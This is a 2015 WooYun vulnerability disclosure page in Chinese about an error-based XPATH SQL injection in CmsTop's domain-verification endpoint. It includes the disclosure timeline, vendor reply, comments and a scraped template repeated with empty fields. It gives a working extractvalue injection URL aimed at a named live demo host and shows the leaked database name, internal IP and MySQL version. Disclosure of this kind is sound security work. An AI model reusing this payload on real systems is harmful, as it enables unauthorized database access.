CMSTOP媒体云&政务版SQL报错注入漏洞（XPATH）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0142783

漏洞标题：CMSTOP媒体云&政务版SQL报错注入漏洞（XPATH）

漏洞作者：路人甲

提交时间：2015-09-22 15:03

修复时间：2015-12-23 14:02

公开时间：2015-12-23 14:02

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-09-22：细节已通知厂商并且等待厂商处理中
2015-09-24：厂商已经确认，细节仅向厂商公开
2015-09-27：细节向第三方安全合作伙伴开放
2015-11-18：细节向核心白帽子及相关领域专家公开
2015-11-28：细节向普通白帽子公开
2015-12-08：细节向实习白帽子公开
2015-12-23：细节向公众公开

简要描述：

详细说明：

厂商官网：http://www.cmstop.com/
产品包括：

CmsTop 媒体版
面向媒体提供“PC站＋手机站＋手机端＋平板端”多终端一体化新媒体技术解决方案，助力媒体融合转型。
媒体云
CmsTop 媒体云
作为媒体云时代的开创者，思拓合众颠覆了传统的软件采购和项目外包模式，与传媒集团建立战略合作伙伴关系，以互联网思维和云计算技术为基础整合集团、区域和行业内的媒体及政务新媒体资源，共同建设和运营媒体云。
政务版
CmsTop 政务版
面向党政部门提供多终端一体化的网站群私有云技术解决方案，助力党政部门打造“两微一端”政务新媒体。

在线演示站点：

http://www.cmstop.cn/

SQL漏洞出在校验域名处
第一步、注册
第二步、设置手机号、qq号等信息
第三，四步、设置个性域名
在这一步缺少过滤，造成注入
提交'

继续构造

http://site.cmstop.cn/index/index/verfiysite?identifier=wooyunad' and extractvalue(1, concat(0x5c, (select database())));

注出数据库：

数据库：cloud_data

注出用户：

用户：10.162.64.228

然后是版本等。。。

版本：5.6.16-log
@@version_compile_os：Linux

漏洞证明：

第一步、注册

第二步、邮箱激活后登陆

第三步、设置信息

第四步、设置域名

这里出现注入

修复方案：

过滤

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：5

确认时间：2015-09-24 14:01

厂商回复：

此漏洞为已知问题，目前已修复，现正在内部测试，测试完成后会更新到线上，感谢关注！

漏洞评价：

2015-09-22 15:19 | chopper ( 普通白帽子 | Rank:154 漏洞数:30 | 菜鸟求学，多多关照~)

刚通过就定价了？
2015-09-22 16:20 | term ( 普通白帽子 | Rank:106 漏洞数:27 )

@chopper 大厂商就这个速度有本事的人就先拿到钱
2015-09-22 16:20 | term ( 普通白帽子 | Rank:106 漏洞数:27 )

@chopper 还有没本事的就等四五个月吧
2015-09-22 16:40 | wy007 ( 普通白帽子 | Rank:108 漏洞数:11 | 其实我是一名卧底...)

我是奔着XPath来的
2015-09-22 18:15 | Huc-Unis ( 普通白帽子 | Rank:1167 漏洞数:318 | 我就要离开乌云了，谢谢Finger和所有的白帽...)

@term 等了138天了
2015-09-22 18:16 | 疯狗 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞，心中自然无码。)

@Huc-Unis O.O @Finger
2015-09-22 21:57 | T0ne5 ( 路人 | Rank:2 漏洞数:1 | 搬砖真的很累。)

坐等过程
2015-09-22 22:47 | 有归于无 ( 普通白帽子 | Rank:100 漏洞数:20 | 有归于无)

坐等xpath注入技巧
2015-12-23 14:19 | 冷白开。 ( 普通白帽子 | Rank:174 漏洞数:74 | QQ:970060225 拒绝黑产，大二屌丝狗求职~)

坐等注入技巧

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0142783

漏洞标题：CMSTOP媒体云&政务版SQL报错注入漏洞（XPATH）

相关厂商：CmsTop

漏洞作者：路人甲

提交时间：2015-09-22 15:03

修复时间：2015-12-23 14:02

公开时间：2015-12-23 14:02

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0142783

漏洞标题：CMSTOP媒体云&政务版SQL报错注入漏洞（XPATH）

相关厂商：CmsTop

漏洞作者： 路人甲

提交时间：2015-09-22 15:03

修复时间：2015-12-23 14:02

公开时间：2015-12-23 14:02

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0142783"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云